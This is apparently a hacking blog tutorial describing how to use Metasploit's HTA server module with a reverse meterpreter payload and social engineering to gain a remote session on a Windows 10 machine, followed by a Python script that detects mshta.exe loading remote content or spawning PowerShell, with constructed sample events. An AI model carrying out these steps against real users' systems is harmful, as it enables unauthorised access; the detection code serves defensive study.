Hello aspiring hackers. In our previous blogpost, you learnt about Windows hacking. In this article, you will learn about the HTA attack, an attack that helps in gaining access to Windows systems. In this attack, HTA files are used to hack the target system.
What is an HTA file?
HTA stands for HTML application. An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. An HTA file gets executed without the constraints of the internet browser security model. In simple words, it gets executed as a “fully trusted” application.
Let’s see an example of how to create this attack. For this, we will be using Metasploit’s windows/misc/hta_server module. In this module, the server hosts an HTA file which, when opened on the target system, will execute a payload via PowerShell. Of course, the browser warns the user before executing the payload. But social engineering can be used to convince the target users to execute the HTA file.
Now let’s see how this attack works. We will use this exploit to gain access to a Windows 10 target. Start Metasploit and load the module as shown below.
Set the reverse meterpreter payload.
Type the command “show options” to see the options we need to set for this exploit. Set the required options and type the command “run” to start the exploit.
As you can see, it has generated a URL where the payload is being hosted. We need to make the target user click on this URL. The target user clicks on this URL as shown below.
The browser opens and prompts a warning about the file as shown below.
When the user ignores the warning and clicks on “run”, a meterpreter session is opened as shown below.
This session can be viewed and opened as shown below.
That’s how the HTA attack works.
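
From the defender's side, the chain described above (an HTA file opened by the Windows HTA host, mshta.exe, which then runs a payload via PowerShell) is visible in process-creation logs. The Python sketch below is an added example, not part of the original post or of Metasploit; it assumes events exported with Sysmon Event ID 1 field names, and every sample event in it is constructed.

```python
import ntpath
import re

# Interpreters an HTA host process rarely has a legitimate reason to start.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

def exe_name(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename((path or "").strip('"')).lower()

def scan(events):
    """Return (pid, rule, mshta_command_line) for each suspicious event."""
    mshta_cmdlines = {}  # pid -> command line of every mshta.exe seen so far
    findings = []
    for ev in events:
        image = exe_name(ev.get("Image"))
        cmdline = ev.get("CommandLine", "")
        if image == "mshta.exe":
            mshta_cmdlines[ev["ProcessId"]] = cmdline
            if REMOTE_URL.search(cmdline):  # HTA loaded straight from a URL
                findings.append((ev["ProcessId"], "mshta_remote_content", cmdline))
        elif exe_name(ev.get("ParentImage")) == "mshta.exe" and image in SUSPICIOUS_CHILDREN:
            # Tie the child back to the HTA that its parent was running.
            source = mshta_cmdlines.get(ev.get("ParentProcessId"), "<parent not in log>")
            findings.append((ev["ProcessId"], "mshta_spawned_interpreter", source))
    return findings

# Constructed sample events (Sysmon Event ID 1 field names); all values are invented.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 3900, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Example\browser.exe",
     "CommandLine": r'mshta.exe "C:\Users\alice\Downloads\constructed.hta"'},
    {"ProcessId": 4312, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell.exe <constructed>"},
    {"ProcessId": 5120, "ParentProcessId": 3900, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://198.51.100.7:8080/constructed.hta"},
    {"ProcessId": 6001, "ParentProcessId": 3000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A locally launched HTA (the first sample event) is not flagged on its own; it is reported only once mshta.exe starts an interpreter, which keeps legitimate administrative HTAs from generating noise.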